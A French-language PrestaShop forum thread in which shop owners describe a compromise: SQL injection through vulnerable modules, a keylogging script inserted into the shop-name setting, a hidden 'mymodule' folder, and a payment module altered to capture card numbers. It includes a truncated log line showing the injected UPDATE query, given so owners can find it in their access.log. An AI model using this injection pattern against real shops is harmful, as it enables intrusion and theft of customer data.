mandrake Posted January 4 Author Share Posted January 4 Oui, pas de soucis. C'est un vieux coucou. Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Avez-vous bien reçu mon message ? Merci Link to comment Share on other sites More sharing options...
kis2a Posted January 4 Share Posted January 4 (edited) Avais vous modifer / ajouter / installer de nouvelle chose (module.. etc ) ou ces arriver comme ca d'un coup ? ( changer deja tous vos acces , ftp , bdd ,email ......... ) il serais peut être judicieux , de vous mettre en maintenance ! pendant la résolution du problème , et même upgrade votre site pour etre a jour car ps 1.6 .......... Edited January 4 by kis2a (see edit history) Link to comment Share on other sites More sharing options...
kis2a Posted January 4 Share Posted January 4 3 hours ago, Eolia said: https://shop.devcustom.net/fr/content/16-nettoyage-hack celui ci marche sur toute version prestashop ? ou limiter a x version ? Link to comment Share on other sites More sharing options...
Mediacom87 Posted January 5 Share Posted January 5 Il y a 17 heures, kis2a a dit : celui ci marche sur toute version prestashop ? ou limiter a x version ? C'est indiqué : Citation - Script compatible toutes versions Presta (les versions supérieures à 1.6 ne sont plus contrôlées en intégrité) 1 Link to comment Share on other sites More sharing options...
jayb174 Posted January 5 Share Posted January 5 This has happened to me twice in the last 5 days. I found that the script was added to the ps_configuration table and changed the value of PS_SHOP_NAME. Have you found any causes or solutions? Link to comment Share on other sites More sharing options...
Mediacom87 Posted January 5 Share Posted January 5 il y a 24 minutes, jayb174 a dit : Cela m'est arrivé deux fois au cours des cinq derniers jours. J'ai découvert que le script avait été ajouté à la table ps_configuration et qu'il avait modifié la valeur de PS_SHOP_NAME. Avez-vous trouvé des causes ou des solutions ? Merci de respecter la langue du topic et de la section du forum. Link to comment Share on other sites More sharing options...
Tfloyd Posted January 10 Share Posted January 10 Bonjour, Ca m'est aussi arrivé sur 2 sites différents cette dernière semaine. De ce que j'ai pu en déduire voilà son fonctionnement : Il repère un module possédant une faille pour réaliser une injection sql. Ca peut être n'importe lequel, chez moi c'était 2 modules différents (un module interne spécifique à une boutique et le module smartblog) Une fois la faille repérée il effectue des requêtes SELECT sur la table INFORMATION_SCHEMA pour récupérer différentes infos dans la base de données Une fois ces informations récupérées, il connaît le nom de la base de données et peut commencer à y faire des UPDATE Il effectue une requête UPDATE sur nom de la boutique (le champ "nom de la boutique" dans Coordonnées & magasins) en y ajoutant le script softbylinux. Ce script peut ensuite être appelé le front mais également sur le backoffice, il semble qu'il se charge de récupérer tout ce qui est tapé (donc mots de passes, etc) Ce n'était pas le cas au début mais maintenant il semble que le nom de la boutique soit remis à sa valeur d'origine après quelques minutes, certainement pour rendre l'intrusion moins visible. Donc ce n'est pas parce que le nom de la boutique est normal que l'attaque n'a pas été faite. Si un mot de passe admin est récupéré, il se connecte et installe un module qui n'est visible que via ftp, mais pas depuis la page modules du BO. Vérifiez que vous n'avez pas un nouveau dossier "mymodule" dans le dossier "modules" de votre site. Si oui, regardez s'il contient un fichier suspect (chez moi myc.php). Si c'est le cas vous pouvez supprimer ce dossier. Je ne sais pas ce que fait exactement ce truc mais le contenu n'était pas joli joli, tout plein de références à du ssh, des mots de passes, etc Enfin, sur une des boutiques, il y a eu à priori une action manuelle, donc une personne se serait loggée en utilisant un mot de passe récupéré au préalable. Notre module de paiement par CB a été modifié pour passer en mode iframe, certainement pour récupérer les numéros de CB des clients. Coup de "chance", ce mode est incompatible sur notre boutique et donc l'iframe ne s'affichait pas et les clients ne pouvaient plus payer (ce qui nous a permit de comprendre qu'il y avait un soucis quelque part d'ailleurs) Le plus important est donc de consulter vos fichiers access.log et de chercher des appels à "SELECT" ou "UPDATE", en général toujours faits sur la table "ps_configuration". Si vous voyez des lignes sortir, vous devrez être capable de voir le module qui a été utilisé pour réaliser l'injection sql en regardant l'url au début de cette même ligne. La ligne en question ressemble à ça : /module/NOM_DU_MODULE/NOM_DU_CONTROLLEUR?p=61%27%3BUPDATE%20NOM_DE_LA_BASE.ps_configuration%20set%20value... Une fois la faille trouvée vous pourrez la corriger ou carrément supprimer le module problématique si vous le pouvez. Malheureusement ça ne semble pas être un module unique qui est source du problème donc chaque boutique devra chercher elle même le module responsable. Il faudra mettre à jour tous les mots de passes BO et par sécurité certainement ceux de la base de donnée et ftp également car je ne sais pas exactement ce qui peut être récupéré. 1 Link to comment Share on other sites More sharing options...
jayb174 Posted January 10 Share Posted January 10 34 minutes ago, Tfloyd said: Bonjour, Ca m'est aussi arrivé sur 2 sites différents cette dernière semaine. De ce que j'ai pu en déduire voilà son fonctionnement : Il repère un module possédant une faille pour réaliser une injection sql. Ca peut être n'importe lequel, chez moi c'était 2 modules différents (un module interne spécifique à une boutique et le module smartblog) Une fois la faille repérée il effectue des requêtes SELECT sur la table INFORMATION_SCHEMA pour récupérer différentes infos dans la base de données Une fois ces informations récupérées, il connaît le nom de la base de données et peut commencer à y faire des UPDATE Il effectue une requête UPDATE sur nom de la boutique (le champ "nom de la boutique" dans Coordonnées & magasins) en y ajoutant le script softbylinux. Ce script peut ensuite être appelé le front mais également sur le backoffice, il semble qu'il se charge de récupérer tout ce qui est tapé (donc mots de passes, etc) Ce n'était pas le cas au début mais maintenant il semble que le nom de la boutique soit remis à sa valeur d'origine après quelques minutes, certainement pour rendre l'intrusion moins visible. Donc ce n'est pas parce que le nom de la boutique est normal que l'attaque n'a pas été faite. Si un mot de passe admin est récupéré, il se connecte et installe un module qui n'est visible que via ftp, mais pas depuis la page modules du BO. Vérifiez que vous n'avez pas un nouveau dossier "mymodule" dans le dossier "modules" de votre site. Si oui, regardez s'il contient un fichier suspect (chez moi myc.php). Si c'est le cas vous pouvez supprimer ce dossier. Je ne sais pas ce que fait exactement ce truc mais le contenu n'était pas joli joli, tout plein de références à du ssh, des mots de passes, etc Enfin, sur une des boutiques, il y a eu à priori une action manuelle, donc une personne se serait loggée en utilisant un mot de passe récupéré au préalable. Notre module de paiement par CB a été modifié pour passer en mode iframe, certainement pour récupérer les numéros de CB des clients. Coup de "chance", ce mode est incompatible sur notre boutique et donc l'iframe ne s'affichait pas et les clients ne pouvaient plus payer (ce qui nous a permit de comprendre qu'il y avait un soucis quelque part d'ailleurs) Le plus important est donc de consulter vos fichiers access.log et de chercher des appels à "SELECT" ou "UPDATE", en général toujours faits sur la table "ps_configuration". Si vous voyez des lignes sortir, vous devrez être capable de voir le module qui a été utilisé pour réaliser l'injection sql en regardant l'url au début de cette même ligne. La ligne en question ressemble à ça : /module/NOM_DU_MODULE/NOM_DU_CONTROLLEUR?p=61%27%3BUPDATE%20NOM_DE_LA_BASE.ps_configuration%20set%20value... Une fois la faille trouvée vous pourrez la corriger ou carrément supprimer le module problématique si vous le pouvez. Malheureusement ça ne semble pas être un module unique qui est source du problème donc chaque boutique devra chercher elle même le module responsable. Il faudra mettre à jour tous les mots de passes BO et par sécurité certainement ceux de la base de donnée et ftp également car je ne sais pas exactement ce qui peut être récupéré. Merci pour le rapport. J'ai eu la même expérience que la vôtre et je l'ai corrigé il y a quelques jours, sauf que mes fichiers n'ont pas été modifiés. Dans mon cas, le module problématique était ph_simpleblog. Celui-ci a été signalé comme malveillant dans le passé. https://security.friendsofpresta.org/module/2021/08/20/ph_simpleblog.html Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now